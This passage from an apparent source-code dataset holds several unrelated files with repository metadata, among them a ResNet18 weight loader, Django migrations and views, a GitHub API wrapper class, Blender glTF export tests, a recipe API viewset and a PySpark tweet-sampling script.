'block3.1.conv_bn2.conv.weight', (256, 256, 3, 3), 'layer3.1.conv2.weight', (256, 256, 3, 3), 'block3.1.conv_bn2.bn.weight', (256,), 'layer3.1.bn2.weight', (256,), 'block3.1.conv_bn2.bn.bias', (256,), 'layer3.1.bn2.bias', (256,), 'block3.1.conv_bn2.bn.running_mean', (256,), 'layer3.1.bn2.running_mean', (256,), 'block3.1.conv_bn2.bn.running_var', (256,), 'layer3.1.bn2.running_var', (256,), 'block4.0.conv_bn1.conv.weight', (512, 256, 3, 3), 'layer4.0.conv1.weight', (512, 256, 3, 3), 'block4.0.conv_bn1.bn.weight', (512,), 'layer4.0.bn1.weight', (512,), 'block4.0.conv_bn1.bn.bias', (512,), 'layer4.0.bn1.bias', (512,), 'block4.0.conv_bn1.bn.running_mean', (512,), 'layer4.0.bn1.running_mean', (512,), 'block4.0.conv_bn1.bn.running_var', (512,), 'layer4.0.bn1.running_var', (512,), 'block4.0.conv_bn2.conv.weight', (512, 512, 3, 3), 'layer4.0.conv2.weight', (512, 512, 3, 3), 'block4.0.conv_bn2.bn.weight', (512,), 'layer4.0.bn2.weight', (512,), 'block4.0.conv_bn2.bn.bias', (512,), 'layer4.0.bn2.bias', (512,), 'block4.0.conv_bn2.bn.running_mean', (512,), 'layer4.0.bn2.running_mean', (512,), 'block4.0.conv_bn2.bn.running_var', (512,), 'layer4.0.bn2.running_var', (512,), 'block4.0.shortcut.conv.weight', (512, 256, 1, 1), 'layer4.0.downsample.0.weight', (512, 256, 1, 1), 'block4.0.shortcut.bn.weight', (512,), 'layer4.0.downsample.1.weight', (512,), 'block4.0.shortcut.bn.bias', (512,), 'layer4.0.downsample.1.bias', (512,), 'block4.0.shortcut.bn.running_mean', (512,), 'layer4.0.downsample.1.running_mean', (512,), 'block4.0.shortcut.bn.running_var', (512,), 'layer4.0.downsample.1.running_var', (512,), 'block4.1.conv_bn1.conv.weight', (512, 512, 3, 3), 'layer4.1.conv1.weight', (512, 512, 3, 3), 'block4.1.conv_bn1.bn.weight', (512,), 'layer4.1.bn1.weight', (512,), 'block4.1.conv_bn1.bn.bias', (512,), 'layer4.1.bn1.bias', (512,), 'block4.1.conv_bn1.bn.running_mean', (512,), 'layer4.1.bn1.running_mean', (512,), 'block4.1.conv_bn1.bn.running_var', (512,), 'layer4.1.bn1.running_var', (512,), 'block4.1.conv_bn2.conv.weight', (512, 512, 3, 3), 'layer4.1.conv2.weight', (512, 512, 3, 3), 'block4.1.conv_bn2.bn.weight', (512,), 'layer4.1.bn2.weight', (512,), 'block4.1.conv_bn2.bn.bias', (512,), 'layer4.1.bn2.bias', (512,), 'block4.1.conv_bn2.bn.running_mean', (512,), 'layer4.1.bn2.running_mean', (512,), 'block4.1.conv_bn2.bn.running_var', (512,), 'layer4.1.bn2.running_var', (512,), 'logit.weight', (1000, 512), 'fc.weight', (1000, 512), 'logit.bias', (1000,), 'fc.bias', (1000,), ] PRETRAIN_FILE = \ '/root/share/project/kaggle/2019/steel/data/pretrain_model/resnet18-5c106cde.pth' def load_pretrain(net, skip=[], pretrain_file=PRETRAIN_FILE, conversion=CONVERSION, is_print=True): #raise NotImplementedError print('\tload pretrain_file: %s'%pretrain_file) #pretrain_state_dict = torch.load(pretrain_file) pretrain_state_dict = torch.load(pretrain_file, map_location=lambda storage, loc: storage) state_dict = net.state_dict() i = 0 conversion = np.array(conversion).reshape(-1,4) for key,_,pretrain_key,_ in conversion: if any(s in key for s in ['.num_batches_tracked',]+skip): continue #print('\t\t',key) if is_print: print('\t\t','%-48s %-24s <--- %-32s %-24s'%( key, str(state_dict[key].shape), pretrain_key, str(pretrain_state_dict[pretrain_key].shape), )) i = i+1 state_dict[key] = pretrain_state_dict[pretrain_key] net.load_state_dict(state_dict) print('') print('len(pretrain_state_dict.keys()) = %d'%len(pretrain_state_dict.keys())) print('len(state_dict.keys()) = %d'%len(state_dict.keys())) print('loaded = %d'%i) print('') ############################################################################### class ConvBn2d(nn.Module): def __init__(self, in_channel, out_channel, kernel_size=3, padding=1, stride=1): super(ConvBn2d, self).__init__() self.conv = nn.Conv2d(in_channel, out_channel, kernel_size=kernel_size, padding=padding, stride=stride, bias=False) self.bn = nn.BatchNorm2d(out_channel, eps=1e-5) def forward(self,x): x = self.conv(x) x = self.bn(x) return x ############# resnext50 pyramid feature net ####################################### # https://github.com/Hsuxu/ResNeXt/blob/master/models.py # https://github.com/D-X-Y/ResNeXt-DenseNet/blob/master/models/resnext.py # https://github.com/miraclewkf/ResNeXt-PyTorch/blob/master/resnext.py # bottleneck type C class BasicBlock(nn.Module): def __init__(self, in_channel, channel, out_channel, stride=1, is_shortcut=False): super(BasicBlock, self).__init__() self.is_shortcut = is_shortcut self.conv_bn1 = ConvBn2d(in_channel, channel, kernel_size=3, padding=1, stride=stride) self.conv_bn2 = ConvBn2d( channel,out_channel, kernel_size=3, padding=1, stride=1) if is_shortcut: self.shortcut = ConvBn2d(in_channel, out_channel, kernel_size=1, padding=0, stride=stride) def forward(self, x): z = F.relu(self.conv_bn1(x),inplace=True) z = self.conv_bn2(z) if self.is_shortcut: x = self.shortcut(x) z += x z = F.relu(z,inplace=True) return z #resnet18 class ResNet18(nn.Module): def __init__(self, num_class=1000 ): super(ResNet18, self).__init__() self.block0 = nn.Sequential( nn.Conv2d(3, 64, kernel_size=7, padding=3, stride=2, bias=False), BatchNorm2d(64), nn.ReLU(inplace=True), ) self.block1 = nn.Sequential( nn.MaxPool2d(kernel_size=3, padding=1, stride=2), BasicBlock( 64, 64, 64, stride=1, is_shortcut=False,), * [BasicBlock( 64, 64, 64, stride=1, is_shortcut=False,) for i in range(1,2)], ) self.block2 = nn.Sequential( BasicBlock( 64,128,128, stride=2, is_shortcut=True, ), * [BasicBlock(128,128,128, stride=1, is_shortcut=False,) for i in range(1,2)], ) self.block3 = nn.Sequential( BasicBlock(128,256,256, stride=2, is_shortcut=True, ), * [BasicBlock(256,256,256, stride=1, is_shortcut=False,) for i in range(1,2)], ) self.block4 = nn.Sequential( BasicBlock(256,512,512, stride=2, is_shortcut=True, ), * [BasicBlock(512,512,512, stride=1, is_shortcut=False,) for i in range(1,2)], ) self.logit = nn.Linear(512,num_class) def forward(self, x): batch_size = len(x) x = self.block0(x) x = F.max_pool2d(x,kernel_size=3, padding=1, stride=2, ceil_mode=False) x = self.block1(x) x = self.block2(x) x = self.block3(x) x = self.block4(x) x = F.adaptive_avg_pool2d(x,1).reshape(batch_size,-1) logit = self.logit(x) return logit # main ################################################################# if __name__ == '__main__': print( '%s: calling main function ... ' % os.path.basename(__file__)) net = ResNet18() load_pretrain(net, is_print=True) #--- if 0: print(net) print('') print('*** print key *** ') state_dict = net.state_dict() keys = list(state_dict.keys()) #keys = sorted(keys) for k in keys: if any(s in k for s in [ 'num_batches_tracked' # '.kernel', # '.gamma', # '.beta', # '.running_mean', # '.running_var', ]): continue p = state_dict[k].data.cpu().numpy() print(' \'%s\',\t%s,'%(k,tuple(p.shape))) print('') exit(0) #--- if 1: #IMAGE_RGB_MEAN = [0.485, 0.456, 0.406] #IMAGE_RGB_STD = [0.229, 0.224, 0.225] net = net.cuda().eval() image_dir ='/root/share/data/imagenet/dummy/256x256' for f in [ 'great_white_shark','screwdriver','ostrich','blad_eagle','english_foxhound','goldfish', ]: image_file = image_dir +'/%s.jpg'%f image = cv2.imread(image_file, cv2.IMREAD_COLOR) image = cv2.resize(image,dsize=(224,224)) #image = image[16:16+224,16:16+224] image = image[:,:,::-1] image = (image.astype(np.float32)/255 -IMAGE_RGB_MEAN)/IMAGE_RGB_STD input = image.transpose(2,0,1) input = torch.from_numpy(input).float().cuda().unsqueeze(0) logit = net(input) proability = F.softmax(logit,-1) probability = proability.data.cpu().numpy().reshape(-1) argsort = np.argsort(-probability) print(f, image.shape) print(probability[:5]) for t in range(5): print(t, '%5d'%argsort[t], probability[argsort[t]]) print('') pass print('\nsucess!') ##############################################################################3 ''' great_white_shark (224, 224, 3) [9.4850137e-09 1.0241954e-10 6.3554895e-01 3.6209035e-01 7.0319895e-04] 0 2 0.63554895 1 3 0.36209035 2 4 0.00070319895 3 391 0.0006877669 4 394 0.0005033317 screwdriver (224, 224, 3) [7.5342734e-07 8.0605433e-10 3.7223426e-08 3.4161702e-09 3.0139031e-09] 0 784 0.97836363 1 845 0.017194362 2 418 0.0009959626 3 744 0.0008223861 4 657 0.0006719876 ostrich (224, 224, 3) [2.2530783e-11 6.3119941e-13 1.6578347e-10 7.2425117e-12 1.0529154e-11] 0 9 0.6178599 1 135 0.37783644 2 127 0.0022111784 3 128 0.00069762324 4 138 0.00046368755 blad_eagle (224, 224, 3) [4.1533657e-14 1.6096601e-12 7.0071298e-16 9.8058961e-16 9.9926985e-17] 0 22 0.9502171 1 21 0.049710903 2 93 5.8040747e-05 3 135 1.1641874e-05 4 146 8.518575e-07 english_foxhound (224, 224, 3) [3.3760391e-17 1.9117241e-11 2.1513479e-12 2.5913074e-15 4.0416227e-13] 0 167 0.8951152 1 166 0.07485257 2 215 0.014488099 3 218 0.011066306 4 162 0.004281139 goldfish (224, 224, 3) [1.8774564e-13 9.9999976e-01 8.1598264e-17 2.6006566e-16 2.0891524e-16] 0 1 0.99999976 1 90 1.4076785e-07 2 88 1.1558041e-07 3 130 9.544082e-09 4 94 4.6506425e-09 '''
19c036b8c37c66b0214ccbfc8b7a4c13c90935d2
87402fcec35a35a45dc305588323c72fa3d203b0
/tasks/migrations/0022_auto_20200925_1348.py
30bef7017d73304f6deadfa32abf64fe1e491aa8
[]
no_license
Aviemusca/task-manager-backend
d80fd20a5aa88a31f5096d17c3ee1ebe86832c7e
b0a9052d94138f4e7d2c1be7f7425ee570f9eec4
refs/heads/master
2022-12-20T10:06:16.648889
2020-09-29T10:31:33
2020-09-29T10:31:33
278,863,723
0
0
null
null
null
null
UTF-8
Python
false
false
449
py
# Generated by Django 3.0.8 on 2020-09-25 13:48 import datetime from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('tasks', '0021_auto_20200907_1043'), ] operations = [ migrations.AlterField( model_name='task', name='deadline', field=models.DateTimeField(default=datetime.datetime(2020, 10, 2, 13, 47, 57, 676103)), ), ]
9a92c56ebf23abfd32e027a9bee74caebb691d5d
f74dd098c3e665d8f605af5ebe7e2874ac31dd2f
/aiogithubapi/objects/repository/release.py
61c880ab667788e696a65c262a1162a9b0c98748
[ "MIT" ]
permissive
ludeeus/aiogithubapi
ce87382698827939aaa127b378b9a11998f13c06
90f3fc98e5096300269763c9a5857481b2dec4d2
refs/heads/main
2023-08-20T19:30:05.309844
2023-08-14T20:24:21
2023-08-14T20:24:21
198,505,021
21
20
MIT
2023-09-11T06:12:10
2019-07-23T20:39:53
Python
UTF-8
Python
false
false
986
py
""" AIOGitHubAPI: Repository Release https://developer.github.com/v3/repos/releases/ """ # pylint: disable=missing-docstring from datetime import datetime from ...objects.base import AIOGitHubAPIBase from ...objects.repository.content import AIOGitHubAPIRepositoryContent class AIOGitHubAPIRepositoryRelease(AIOGitHubAPIBase): """Repository Release GitHub API implementation.""" @property def tag_name(self): return self.attributes.get("tag_name") @property def name(self): return self.attributes.get("name") @property def published_at(self): return datetime.strptime(self.attributes.get("published_at"), "%Y-%m-%dT%H:%M:%SZ") @property def draft(self): return self.attributes.get("draft") @property def prerelease(self): return self.attributes.get("prerelease") @property def assets(self): return [AIOGitHubAPIRepositoryContent(x) for x in self.attributes.get("assets", [])]
b961193349a8103c8c431616e1dd217e33b4484d
0fef5d75b0896116eda121c4d7c8a4ad6686a0f7
/kotti_image_gallery/views.py
aca92925141697899cbe39251257bae08515e3ba
[]
no_license
disko/kotti_image_gallery
1144d06f31f3d07f759b73d88a066730bc0ed920
046d127effdf3774cf0c1b04f2ef599e6134becb
HEAD
2016-09-06T05:11:24.588627
2012-06-20T09:10:36
2012-06-20T09:10:36
4,111,810
0
1
null
null
null
null
UTF-8
Python
false
false
4,719
py
# -*- coding: utf-8 -*- import PIL from kotti import DBSession from kotti.util import _ from kotti.views.edit import ContentSchema, make_generic_add, make_generic_edit from kotti.views.file import AddFileFormView, EditFileFormView from kotti_image_gallery import image_scales from kotti_image_gallery.resources import Gallery, Image from plone.scale.scale import scaleImage from pyramid.response import Response from pyramid.view import view_config PIL.ImageFile.MAXBLOCK = 33554432 class GallerySchema(ContentSchema): pass class BaseView(object): def __init__(self, context, request): self.context = context self.request = request class GalleryView(BaseView): @view_config(context=Gallery, name='view', permission='view', renderer='templates/gallery-view.pt') def view(self): session = DBSession() query = session.query(Image).filter(Image.parent_id==self.context.id).order_by(Image.position) images = query.all() return {"images": images} class EditImageFormView(EditFileFormView): pass class AddImageFormView(AddFileFormView): item_type = _(u"Image") def add(self, **appstruct): buf = appstruct['file']['fp'].read() return Image(title=appstruct['title'], description=appstruct['description'], data=buf, filename=appstruct['file']['filename'], mimetype=appstruct['file']['mimetype'], size=len(buf), ) class ImageView(BaseView): @view_config(context=Image, name='view', permission='view', renderer='templates/image-view.pt') def view(self): return {} @view_config(context=Image, name="image", permission='view') def image(self): """return the image in a specific scale, either inline (default) or as attachment""" subpath = list(self.request.subpath) if (len(subpath) > 0) and (subpath[-1] == "download"): disposition = "attachment" subpath.pop() else: disposition = "inline" if len(subpath) == 1: scale = subpath[0] if scale in image_scales: # /path/to/image/scale/thumb width, height = image_scales[scale] else: # /path/to/image/scale/160x120 try: width, height = [int(v) for v in scale.split("x")] except ValueError: width, height = (None, None) elif len(subpath) == 2: # /path/to/image/scale/160/120 try: width, height = [int(v) for v in subpath] except ValueError: width, height = (None, None) else: # don't scale at all width, height = (None, None) if width and height: image, format, size = scaleImage(self.context.data, width=width, height=height, direction="thumb") else: image = self.context.data res = Response( headerlist=[('Content-Disposition', '%s;filename="%s"' % (disposition, self.context.filename.encode('ascii', 'ignore'))), ('Content-Length', str(len(image))), ('Content-Type', str(self.context.mimetype)), ], app_iter=image) return res def includeme(config): config.add_static_view('static-kotti_image_gallery', 'kotti_image_gallery:static') config.scan("kotti_image_gallery") config.add_view(AddImageFormView, name=Image.type_info.add_view, permission='add', renderer='kotti:templates/edit/node.pt',) config.add_view(EditImageFormView, context=Image, name='edit', permission='edit', renderer='kotti:templates/edit/node.pt', ) config.add_view(make_generic_edit(GallerySchema()), context=Gallery, name='edit', permission='edit', renderer='kotti:templates/edit/node.pt', ) config.add_view(make_generic_add(GallerySchema(), Gallery), name=Gallery.type_info.add_view, permission='add', renderer='kotti:templates/edit/node.pt', )
a4119ba39b831d8757ef26706cf178071762301f
9f1a56cbf621b34f539b64e526f00f68423a235a
/zigida/apps/db/accounting/items/migrations/0001_initial.py
ff2e312708e73881e78622e43232fdf8253ba8b9
[]
no_license
JacobSima/zando
21d982b190a719982bd5648ac135fbfbe45dbf00
e6fcac1ce97796d1dea5104f1b73bbf9b8822b98
refs/heads/main
2023-06-15T03:51:52.846591
2021-07-12T10:52:25
2021-07-12T10:52:25
385,208,981
0
0
null
null
null
null
UTF-8
Python
false
false
2,226
py
# Generated by Django 3.2.4 on 2021-07-06 15:56 import django.core.validators from django.db import migrations, models import uuid import zigida.core.utils class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Item', fields=[ ('datetime_created', models.DateTimeField(auto_now_add=True, verbose_name='DATE CREATED')), ('datetime_updated', models.DateTimeField(auto_now=True, verbose_name='DATE UPDATED')), ('last_updated_by', models.CharField(blank=True, max_length=50, null=True, verbose_name='LAST UPDATED BY')), ('bool_deleted', models.BooleanField(default=False, verbose_name='IS DELETED?')), ('uuid_code', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, verbose_name='ID')), ('token_key', models.UUIDField(blank=True, default=uuid.uuid4, editable=False, null=True, verbose_name='TOKEN')), ('code', models.CharField(default=zigida.core.utils.item_randcode_gen, max_length=100, verbose_name='CODE')), ('quantity', models.PositiveSmallIntegerField(blank=True, default=1, null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(999)], verbose_name='QUANTITY')), ('price_buy', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE BUY')), ('price_buy_original', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE BUY ORIGINAL')), ('price_sell', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE SELL')), ('price_sell_original', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE SELL ORIGINAL')), ('bool_active', models.BooleanField(default=True, verbose_name='IS ACTIVE')), ], options={ 'verbose_name_plural': 'items', 'db_table': 'items', }, ), ]
d0dac47833468b6340e44046570fe50b20cf344b
6d5545faf2af0a6bb565ad698bb824110b40e121
/WEBAPP/MLmodel/inception_client.py.runfiles/org_tensorflow/tensorflow/contrib/distributions/python/ops/relaxed_bernoulli.py
2d4ef07a06f25969cc7017d174db5616a93b3e04
[ "MIT" ]
permissive
sunsuntianyi/mlWebApp_v2
abb129cd43540b1be51ecc840127d6e40c2151d3
5198685bf4c4e8973988722282e863a8eaeb426f
refs/heads/master
2021-06-23T22:02:38.002145
2020-11-20T02:17:43
2020-11-20T02:17:43
162,194,249
1
0
null
null
null
null
UTF-8
Python
false
false
152
py
/private/var/tmp/_bazel_tianyi/f29d1e61689e4e4b318f483932fff4d0/external/org_tensorflow/tensorflow/contrib/distributions/python/ops/relaxed_bernoulli.py
7999c9e767ff7ebde5862e9be1c8e6c2ba746d76
0e1e643e864bcb96cf06f14f4cb559b034e114d0
/Exps_7_v3/doc3d/Ablation3_Pyr_ch016_ep010_noFocus/step10_b1_train.py
3aaadbfa5d58d8ec98b4c4672a778cf2dced46a2
[]
no_license
KongBOy/kong_model2
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
1af20b168ffccf0d5293a393a40a9fa9519410b2
refs/heads/master
2022-10-14T03:09:22.543998
2022-10-06T11:33:42
2022-10-06T11:33:42
242,080,692
3
0
null
null
null
null
UTF-8
Python
false
false
4,653
py
############################################################################################################################################################################################################# ############################################################################################################################################################################################################# ### 把 kong_model2 加入 sys.path import os code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層 kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層 kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir import sys ### 把 kong_model2 加入 sys.path sys.path.append(kong_model2_dir) # print(__file__.split("\\")[-1]) # print(" code_exe_path:", code_exe_path) # print(" code_exe_path_element:", code_exe_path_element) # print(" kong_layer:", kong_layer) # print(" kong_model2_dir:", kong_model2_dir) ############################################################################################################################################################################################################### # 按F5執行時, 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~ 才可 import step10_a.py 喔! code_exe_dir = os.path.dirname(code_exe_path) ### 目前執行 step10_b.py 的 dir if(os.getcwd() != code_exe_dir): ### 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~ os.chdir(code_exe_dir) # print("current_path:", os.getcwd()) ############################################################################################################################################################################################################### ### 所有 指令 統一寫這邊 from step10_c_exp_command import * ###################################################################################################################### import subprocess as sb ### I_w_M_to_C 3UNet/wiDiv/woDiv %& FL/FM/NL/NM # sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L5__woD_L__Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L5__woD_L__Full_Less_in_have_bg .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L6__woD_L__Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L6__woD_L__Full_Less_in_have_bg .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L7__woD_L__Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_I_w_M_to_W__ch016_L7__woD_L__Full_Less_in_have_bg .{train}"]) ### W_w_M_to_C woDiv # sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L5__woD_L__Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L5__woD_L__Full_Less_in_have_bg .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L6__woD_L__Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L6__woD_L__Full_Less_in_have_bg .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L7__woD_L__Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_W_w_M_to_C__ch016_L7__woD_L__Full_Less_in_have_bg .{train}"]) ##### 一起訓練 ### 4. woD_L woD_L(記得 woD_L 的 seperate 要設 False),第二個測這個 # 這個是我意想不到竟然做得更好的結果, 我想看看他可以做得多好 # sb.run(cmd_python_step10_a + [f"exp_L5_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_L5_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_L6_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_L6_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_L7_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less .{train}"]) # sb.run(cmd_python_step10_a + [f"exp_L7_I_w_M_to_W_ch016_woD_L_Full_Less__W_w_M_to_C_ch016_woD_L_Full_Less_in_have_bg .{train}"])
6337e2499c6fa0da29ea130222d938fa6a36f58a
528f910908885c3ded4ecc6380b9603c8dcacbd6
/tbapi/top/api/rest/SimbaRptCustbaseGetRequest.py
c9d9394a3214923195d5a87283bd2c0146389272
[]
no_license
Monica-ckd/data007
15fe9c4c898a51a58100138b6b064211199d2ed1
0e54ae57eb719b86ec14ce9f77b027882a3398a8
refs/heads/master
2023-03-16T05:26:14.257318
2016-05-25T06:57:05
2016-05-25T06:57:05
null
0
0
null
null
null
null
UTF-8
Python
false
false
464
py
''' Created by auto_sdk on 2013-04-01 16:44:41 ''' from top.api.base import RestApi class SimbaRptCustbaseGetRequest(RestApi): def __init__(self,domain='gw.api.taobao.com',port=80): RestApi.__init__(self,domain, port) self.end_time = None self.nick = None self.page_no = None self.page_size = None self.source = None self.start_time = None self.subway_token = None def getapiname(self): return 'taobao.simba.rpt.custbase.get'
a66ad8b37efa20112165adcc07b03e6251140a84
7a5576a22774c8e36830781a845c0ac39243af99
/tests/unit/test_image.py
e26427a2f2abfd00f2f1968405b9a41875cc1403
[ "Apache-2.0" ]
permissive
Kupoman/blendergltf
1ccece9793005c57683baf6cfd50cadb7ff303c0
cd665283e5fce6447abba22dfd9f584c602a1782
refs/heads/develop
2022-07-04T06:04:04.535191
2019-06-16T01:32:40
2019-06-16T02:21:09
51,494,812
353
60
Apache-2.0
2020-05-30T14:29:18
2016-02-11T04:53:55
Python
UTF-8
Python
false
false
2,570
py
def test_image_export_reference(exporters, state, bpy_image_default, gltf_image_default): state['settings']['images_data_storage'] = 'REFERENCE' gltf_image_default['uri'] = '../filepath.png' output = exporters.ImageExporter.export(state, bpy_image_default) assert output == gltf_image_default def test_image_export_embed(exporters, state, bpy_image_default, gltf_image_default): state['settings']['images_data_storage'] = 'EMBED' gltf_image_default['uri'] = ( 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACElEQVR42gMAAAAAAW' '/dyZEAAAAASUVORK5CYII=' ) gltf_image_default['mimeType'] = 'image/png' output = exporters.ImageExporter.export(state, bpy_image_default) assert output == gltf_image_default def test_image_export_embed_glb(exporters, state, bpy_image_default, gltf_image_default): state['settings']['images_data_storage'] = 'EMBED' state['settings']['gltf_export_binary'] = True gltf_image_default['mimeType'] = 'image/png' gltf_image_default['bufferView'] = 'bufferView_buffer_Image_0' output = exporters.ImageExporter.export(state, bpy_image_default) for ref in state['references']: ref.source[ref.prop] = ref.blender_name assert output == gltf_image_default def test_image_to_data_uri(exporters, bpy_image_default): image_data = ( b'\x89PNG\r\n\x1a\n\x00\x00\x00\r' b'IHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x08' b'IDATx\xda\x03\x00\x00\x00\x00\x01o\xdd\xc9\x91\x00\x00\x00\x00' b'IEND\xaeB`\x82' ) assert exporters.ImageExporter.image_to_data_uri(bpy_image_default) == image_data def test_image_check(exporters, state, bpy_image_default): assert exporters.ImageExporter.check(state, bpy_image_default) def test_image_default(exporters, state, bpy_image_default): assert exporters.ImageExporter.default(state, bpy_image_default) == { 'name': 'Image', 'uri': '', } def test_image_check_0_x(exporters, state, bpy_image_default): bpy_image_default.size = [0, 1] assert exporters.ImageExporter.check(state, bpy_image_default) is not True def test_image_check_0_y(exporters, state, bpy_image_default): bpy_image_default.size = [1, 0] assert exporters.ImageExporter.check(state, bpy_image_default) is not True def test_image_check_type(exporters, state, bpy_image_default): bpy_image_default.type = 'NOT_IMAGE' assert exporters.ImageExporter.check(state, bpy_image_default) is not True
79609da4ebb7b41e9546575df82cac770fc8e609
3c541cf9d6956f580eb6fec039e567d0813ee272
/apps/recipes/views/recipes.py
8ea96fb3baf2507cfcc458eceef1f76889e0aaa4
[]
no_license
NicolasTerroni/MyFridgeAPI
9c4a7b28f48d9c547b82bc45348a4a2bd58d8551
5cd1b3155c4542d0479948f39701b539497e28f7
refs/heads/main
2023-07-01T03:05:09.422293
2021-08-10T04:10:44
2021-08-10T04:10:44
382,104,468
0
0
null
null
null
null
UTF-8
Python
false
false
2,893
py
"""Recipes views.""" # Django REST Framework from rest_framework.viewsets import ModelViewSet from rest_framework.decorators import action from rest_framework.response import Response # Serializers from apps.recipes.serializers import RecipeModelSerializer, CreateRecipeSerializer # Models from apps.recipes.models import Recipe # Permissions from rest_framework.permissions import IsAuthenticated from apps.recipes.permissions import IsRecipeOwner # Utilities from collections import Counter class RecipesViewSet(ModelViewSet): """Recipes viewset.""" queryset = Recipe.objects.all() lookup_field = 'slug_name' def get_permissions(self): """Assign permissions based on action.""" permissions = [IsAuthenticated,] if self.action in ['update','partial_update','destroy']: permissions.append(IsRecipeOwner) return [permission() for permission in permissions] def get_serializer_class(self): """Return serializer class based on action.""" if self.action == "create": return CreateRecipeSerializer else: return RecipeModelSerializer @action(detail=False) def possible_recipes(self, request): """Returns recipes that contain at least one of the ingredients from the user's fridge.""" # Get user fridge's ingredients fridge_ingredients_queryset = request.user.fridge.ingredients.all() # Transform the queryset into a list fridge_ingredients = [i for i in fridge_ingredients_queryset] # Get recipes that contain at least one of the ingredients from the user's fridge queryset = Recipe.objects.filter(ingredients__in=fridge_ingredients) # This will append to the queryset a recipe instance for each ingredient that matches. # Now order by most repeated recipes in the queryset and remove the repeated recipe instances. counts = Counter(queryset) queryset = sorted(counts, key=counts.get, reverse=True) # Pagination page = self.paginate_queryset(queryset) if page is not None: serializer = self.get_serializer(page, many=True) return self.get_paginated_response(serializer.data) serializer = self.get_serializer(queryset, many=True) return Response(serializer.data) @action(detail=False) def my_recipes(self, request): """List the requesting user recipes.""" queryset = Recipe.objects.filter(created_by=request.user) # Pagination page = self.paginate_queryset(queryset) if page is not None: serializer = self.get_serializer(page, many=True) return self.get_paginated_response(serializer.data) serializer = self.get_serializer(queryset, many=True) return Response(serializer.data)
be134015a3d29b2e9234fc1baf05fbb8b076fb41
fcd2ece104f3c5ade822fd8b6ae35e3dd48e35b1
/code/2-twitter_labor/1-training_data_preparation/preliminary/ngram_labeling/build_set_specificity_check.py
54d4e9a89780968a89e234a79ce889fe5ec87f76
[]
no_license
spfraib/twitter
975742c9090b628ade0ec7230d0a9f09ab6e5d4a
da2104d30d094d5f943a057f5c1df902c2254d4d
refs/heads/master
2023-06-22T08:37:22.523478
2022-12-30T17:49:33
2022-12-30T17:49:33
236,588,781
6
4
null
2023-06-12T21:28:41
2020-01-27T20:34:53
Jupyter Notebook
UTF-8
Python
false
false
1,488
py
from pyspark.sql import SparkSession import pyspark.sql.functions as F from pyspark.ml.feature import Bucketizer, QuantileDiscretizer from pyspark.sql import Window from pyspark.sql.types import * from pyspark.sql.functions import lower, col, lit import subprocess import argparse import os import unicodedata import sys from pyspark.sql.functions import translate, regexp_replace from pyspark.sql.types import StringType from pyspark.sql.functions import udf try: spark except NameError: spark = SparkSession.builder.appName("").getOrCreate() if __name__ == "__main__": df_sample_1000 = spark.read.parquet('/user/mt4493/twitter/ngram_samples/US/sample_1000') df_sample_new_1000 = spark.read.parquet('/user/mt4493/twitter/ngram_samples/US/sample_new_1000') df = df_sample_1000.union(df_sample_new_1000) df = df.withColumn('text', regexp_replace('text', '\\', ' ')) dropped_ngrams_list = ['i_fired', 'firedme', 'i_unemployed', 'i_jobless', 'i_not_working'] df = df.filter(~df.ngram.isin(dropped_ngrams_list)) f = df.groupby('ngram').count() f = f.withColumn('frac', F.when(col('count') < 20, 1).otherwise(20 / col('count'))) frac_dict = dict(f.select('ngram', 'frac').collect()) df_sampled = df.sampleBy('ngram', fractions=frac_dict) df_sampled = df_sampled.select('tweet_id', 'text', 'ngram') df_sampled.coalesce(1).write.mode("overwrite").option("header", "true").csv('/user/mt4493/twitter/ngram_samples/US/specificity_check')
